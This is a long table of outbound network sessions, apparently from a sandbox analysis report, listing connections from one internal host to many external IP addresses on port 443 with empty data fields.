                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23447192.168.2.235024883.12.93.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23448192.168.2.233451649.24.100.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23449192.168.2.2359782223.146.43.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23450192.168.2.2356574172.73.115.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23451192.168.2.23440941.94.150.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23452192.168.2.2338600134.79.58.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23453192.168.2.234528248.49.17.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23454192.168.2.2356678143.134.86.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23455192.168.2.2360228209.183.90.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23456192.168.2.2333180176.155.221.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23457192.168.2.2351562140.153.13.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23458192.168.2.2345150171.135.49.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23459192.168.2.2336858103.138.120.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23460192.168.2.236072099.179.43.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23461192.168.2.2348026171.73.81.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23462192.168.2.2351662181.108.22.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23463192.168.2.2360158117.252.100.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23464192.168.2.2348216192.203.246.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23465192.168.2.2360528140.97.230.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23466192.168.2.2336776110.190.52.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23467192.168.2.2360094205.254.122.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23468192.168.2.2358092144.23.86.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23469192.168.2.234786823.190.202.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23470192.168.2.2346862223.14.189.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23471192.168.2.235297454.193.86.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23472192.168.2.2352854106.229.142.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23473192.168.2.2339318149.243.89.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23474192.168.2.2333790126.159.116.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23475192.168.2.2343720137.74.8.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23476192.168.2.2340092202.185.146.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23477192.168.2.2360154181.226.254.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23478192.168.2.233515472.197.247.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23479192.168.2.2348440149.248.166.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23480192.168.2.2349744129.233.189.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23481192.168.2.2333108147.156.222.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23482192.168.2.2358450180.21.38.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23483192.168.2.23355468.29.230.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23484192.168.2.233769090.198.57.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23485192.168.2.2334952106.185.207.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23486192.168.2.233366673.104.108.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23487192.168.2.234673235.230.61.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23488192.168.2.2346524197.29.67.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23489192.168.2.2336012137.38.69.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23490192.168.2.2351064151.148.185.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23491192.168.2.2337198188.124.163.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23492192.168.2.235595089.95.75.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23493192.168.2.2349328150.244.45.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23494192.168.2.2336946114.237.19.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23495192.168.2.234473891.108.92.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23496192.168.2.235243413.12.102.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23497192.168.2.2354766148.76.28.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23498192.168.2.2355130137.115.8.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23499192.168.2.2337108210.185.38.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23500192.168.2.235020490.176.71.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23501192.168.2.235076079.160.104.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23502192.168.2.2346562159.236.117.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23503192.168.2.233479817.119.5.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23504192.168.2.23460625.106.203.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23505192.168.2.233677690.3.73.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23506192.168.2.2340596188.191.44.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23507192.168.2.2352418184.20.147.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23508192.168.2.2349724105.111.58.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23509192.168.2.23533089.74.191.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23510192.168.2.2358690201.186.237.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23511192.168.2.2344660102.232.250.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23512192.168.2.23511821.187.39.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23513192.168.2.235056690.248.207.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23514192.168.2.234982651.235.8.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23515192.168.2.234682232.26.86.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23516192.168.2.235171052.5.83.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23517192.168.2.233455212.250.11.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23518192.168.2.2352040184.194.51.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23519192.168.2.234347234.14.187.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23520192.168.2.2359634188.87.195.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23521192.168.2.2344340202.196.158.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23522192.168.2.2338258205.193.199.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23523192.168.2.235443091.159.176.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23524192.168.2.2353180144.62.84.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23525192.168.2.2352268109.93.84.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23526192.168.2.2336634182.106.88.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23527192.168.2.2334036188.33.143.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23528192.168.2.234152453.32.240.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23529192.168.2.2335376191.54.57.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23530192.168.2.235962079.84.216.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23531192.168.2.234287261.250.55.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23532192.168.2.2340718102.82.188.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23533192.168.2.2355712128.6.123.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23534192.168.2.2340252137.162.206.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23535192.168.2.2351592185.81.6.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23536192.168.2.2357404108.184.180.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23537192.168.2.2343110193.213.147.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23538192.168.2.235223488.73.192.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23539192.168.2.2340738159.227.22.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23540192.168.2.234788058.86.220.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23541192.168.2.23544384.149.186.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23542192.168.2.235711860.226.35.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23543192.168.2.2351320182.63.176.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23544192.168.2.2347252191.255.98.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23545192.168.2.233333492.101.160.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23546192.168.2.2353854121.210.38.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23547192.168.2.233289658.161.50.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23548192.168.2.2342070195.134.74.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23549192.168.2.2352922116.32.241.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23550192.168.2.235276683.252.156.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23551192.168.2.2345150117.128.213.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23552192.168.2.234660865.217.40.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23553192.168.2.235696485.129.200.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23554192.168.2.235409692.222.151.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23555192.168.2.2333072182.58.8.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23556192.168.2.2349380155.126.28.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23557192.168.2.2350498168.223.251.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23558192.168.2.2337748201.94.238.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23559192.168.2.2358318125.112.4.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23560192.168.2.2336448220.182.197.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23561192.168.2.2354436192.156.89.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23562192.168.2.2346454193.33.137.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23563192.168.2.235770619.253.235.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23564192.168.2.235921631.109.87.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23565192.168.2.2334132111.107.116.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23566192.168.2.2337780189.229.144.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23567192.168.2.2342884108.218.59.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23568192.168.2.234229460.55.230.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23569192.168.2.234746812.165.48.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23570192.168.2.234231097.22.227.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23571192.168.2.233759631.181.231.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23572192.168.2.235821261.67.132.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23573192.168.2.2338504168.188.40.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23574192.168.2.235042461.40.244.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23575192.168.2.2356660141.115.87.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23576192.168.2.234787423.66.18.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23577192.168.2.235422824.69.247.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23578192.168.2.235359038.244.71.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23579192.168.2.233621037.238.225.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23580192.168.2.234845640.219.130.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23581192.168.2.233605668.57.172.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23582192.168.2.2349348182.228.46.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23583192.168.2.234773886.104.86.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23584192.168.2.23359264.59.230.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23585192.168.2.233927874.115.127.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23586192.168.2.2343760200.215.252.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23587192.168.2.2337704108.59.240.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23588192.168.2.2343728205.92.131.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23589192.168.2.233985880.41.107.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23590192.168.2.233916436.179.179.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23591192.168.2.2355018172.180.180.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23592192.168.2.2348776209.112.185.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23593192.168.2.235063441.144.176.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23594192.168.2.2335684154.135.224.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23595192.168.2.2339462151.20.164.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23596192.168.2.235245684.240.201.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23597192.168.2.2333780196.131.162.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23598192.168.2.235436458.92.226.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23599192.168.2.234049845.96.150.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23600192.168.2.23410848.176.62.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23601192.168.2.2338898115.247.35.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23602192.168.2.2332786121.163.107.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23603192.168.2.2334984146.99.213.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23604192.168.2.234072052.225.13.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23605192.168.2.2349106160.232.134.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23606192.168.2.2355912211.188.236.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23607192.168.2.2335114220.191.80.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23608192.168.2.2335288161.238.222.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23609192.168.2.234446693.182.249.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23610192.168.2.2344414122.127.147.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23611192.168.2.2334336219.238.128.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23612192.168.2.235424060.223.241.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23613192.168.2.233291492.236.199.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23614192.168.2.2342346142.193.122.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23615192.168.2.2345818164.15.117.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23616192.168.2.234576857.164.25.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23617192.168.2.2353554125.53.43.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23618192.168.2.234873661.123.231.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23619192.168.2.2346798217.183.239.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23620192.168.2.235774862.16.199.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23621192.168.2.2335038130.91.150.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23622192.168.2.2338508128.40.12.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23623192.168.2.234914671.183.10.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23624192.168.2.233997683.5.253.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23625192.168.2.2353050190.80.164.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23626192.168.2.2349386178.163.205.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23627192.168.2.2340802100.161.179.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23628192.168.2.2348940121.187.48.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23629192.168.2.2360878201.53.64.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23630192.168.2.235052891.41.60.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23631192.168.2.233873286.51.74.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23632192.168.2.234947263.228.3.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23633192.168.2.234703258.163.31.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23634192.168.2.2348644109.11.163.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23635192.168.2.2354888199.128.177.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23636192.168.2.2334032144.243.189.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23637192.168.2.2336430137.102.210.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23638192.168.2.2348836164.153.93.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23639192.168.2.2350504107.105.133.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23640192.168.2.2343958202.175.90.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23641192.168.2.2350896143.111.111.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23642192.168.2.234929820.192.92.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23643192.168.2.233838897.195.100.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23644192.168.2.2344228180.19.242.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23645192.168.2.234213638.235.169.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23646192.168.2.233398452.14.127.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23647192.168.2.233462697.109.208.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23648192.168.2.2347708168.98.207.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23649192.168.2.233606840.16.208.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23650192.168.2.234755035.138.61.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23651192.168.2.2339064139.84.164.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23652192.168.2.2356380134.92.98.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23653192.168.2.234369032.224.189.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23654192.168.2.2337430187.216.68.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23655192.168.2.2347844166.105.9.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23656192.168.2.235990840.237.16.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23657192.168.2.2336440146.33.145.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23658192.168.2.235515818.113.79.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23659192.168.2.234697871.144.182.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23660192.168.2.2352038191.63.85.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23661192.168.2.235043298.217.14.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23662192.168.2.2341536121.88.217.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23663192.168.2.2358198210.142.135.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23664192.168.2.2342892105.27.186.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23665192.168.2.234494695.219.7.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23666192.168.2.2336884183.201.71.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23667192.168.2.2357812184.170.124.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23668192.168.2.235971494.51.133.161443
